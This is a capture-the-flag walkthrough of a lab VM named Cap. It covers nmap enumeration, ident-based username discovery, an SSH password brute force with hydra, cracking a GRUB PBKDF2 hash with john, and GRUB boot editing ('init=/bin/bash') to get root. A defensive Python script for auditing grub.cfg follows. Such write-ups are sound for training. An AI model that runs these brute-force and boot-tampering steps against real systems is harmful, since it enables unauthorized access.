# Lab setup

Download: Cap

NAT, IP: 192.168.1.179

# Penetration process

# Initial information gathering

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It w
┌──(root㉿kali)-[~]
└─# nmap -6 -p- -A fe80::20c:29ff:fe15:15d2%eth0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 04:46 EDT
Nmap scan report for fe80::20c:29ff:fe15:15d2
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
113/tcp open  ident?
```

The box is called Cap, which hints at capturing traffic, so open Wireshark and connect to port 113 (the ident service): `ncat -6 fe80::20c:29ff:fe15:15d2%eth0 113`

In Wireshark, note the local source port of that connection, then send `113,<local port>` to the ident service; it replies with the username lucas.

Brute-force the password: `hydra -l lucas -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.179 -I -t 64`

Password obtained: capricorn

Further enumeration turns up the file /boot/grub/grub.cfg, which contains a password hash; crack it:

grub.pbkdf2.sha512.10000.E9DF42546DD8E4FA1D59A023BF0E3D9C83FFE8F0C1DE14FB88BCCCBBE5BD8FA7DAF1A9AC25593A43E094F8F00E8D0CDF81F066993234AC53DF5EE59BDD288E82.85C7A1032D4FA7D74E645A13DEBE367CFBF5A3AE7B1378D99BC2D00FF9EF8187F602865B972B538BC1678E17EEFE7A27C80AC1DD96D906FC1FBA5079779F163E

john cracks it to: starwars

`su` with that password fails, and SSH login with it fails too.

After reading a walkthrough (WP), it turns out a reboot is needed, followed by entering the GRUB edit mode, which requires console (hands-on) access.

Enter edit mode with this password, then change `ro` to `rw init=/bin/bash`.

Press F10 to boot with the edited entry, and you get a root shell.

Run `passwd` to change the root password; after that `su` works.
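A defender-side check for the weakness used here, added as an example and not part of the original writeup: it parses the `grub.pbkdf2.<alg>.<iterations>.<salt>.<digest>` format from a grub.cfg and flags a missing `set superusers`, a low iteration count, a short salt, a plaintext `password` directive and a world-readable file. The sample hashes and config fragments are constructed placeholders, and the iteration and salt thresholds are assumptions based on GRUB's own defaults.

```python
import re
import stat

# Constructed sample hashes (placeholder digests, not real ones) in the grub.pbkdf2 format
STRONG_HASH = "grub.pbkdf2.sha512.10000.%s.%s" % ("A" * 128, "B" * 128)
WEAK_HASH = "grub.pbkdf2.sha512.1000.%s.%s" % ("A" * 16, "B" * 128)
# Constructed grub.cfg fragments: one hardened, one showing the weaknesses the audit flags
SAMPLE_OK = 'set superusers="root"\npassword_pbkdf2 root %s\n' % STRONG_HASH
SAMPLE_WEAK = "password_pbkdf2 root %s\n" % WEAK_HASH

HASH_RE = re.compile(r"grub\.pbkdf2\.(sha\d+)\.(\d+)\.([0-9A-Fa-f]+)\.([0-9A-Fa-f]+)")
MIN_ITERATIONS = 10000  # assumption: GRUB's default count; treat fewer as weak
MIN_SALT_HEX = 128      # assumption: grub-mkpasswd-pbkdf2 defaults to a 64-byte salt


def parse_grub_hash(value):
    """Split 'grub.pbkdf2.<alg>.<iters>.<salt>.<digest>' into (alg, iters, salt, digest)."""
    m = HASH_RE.fullmatch(value)
    if not m:
        raise ValueError("not a grub.pbkdf2 hash: %r" % value)
    alg, iters, salt, digest = m.groups()
    return alg, int(iters), salt, digest


def audit_grub_cfg(text, mode=None):
    """Return a list of findings for a grub.cfg body; mode is the file's st_mode, if known."""
    findings = []
    if not re.search(r"^set superusers=", text, re.M):
        findings.append("no 'set superusers': menu editing is not password protected")
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] == "password_pbkdf2":
            alg, iters, salt, _ = parse_grub_hash(parts[2])
            if iters < MIN_ITERATIONS:
                findings.append("user %s: only %d PBKDF2-%s iterations" % (parts[1], iters, alg))
            if len(salt) < MIN_SALT_HEX:
                findings.append("user %s: short salt (%d hex chars)" % (parts[1], len(salt)))
        elif len(parts) == 3 and parts[0] == "password":
            findings.append("user %s: plaintext 'password' directive" % parts[1])
    # A readable grub.cfg lets any local user copy the hash for offline cracking
    if mode is not None and mode & stat.S_IROTH:
        findings.append("grub.cfg is world-readable: the hash can be copied for offline cracking")
    return findings


if __name__ == "__main__":
    for name, cfg, mode in (("ok", SAMPLE_OK, 0o600), ("weak", SAMPLE_WEAK, 0o444)):
        print(name, audit_grub_cfg(cfg, mode) or ["no findings"])
```

Even with a strong GRUB password, anyone with console access and an unencrypted disk can still boot other media; the password only protects the menu, so full-disk encryption is the complementary control.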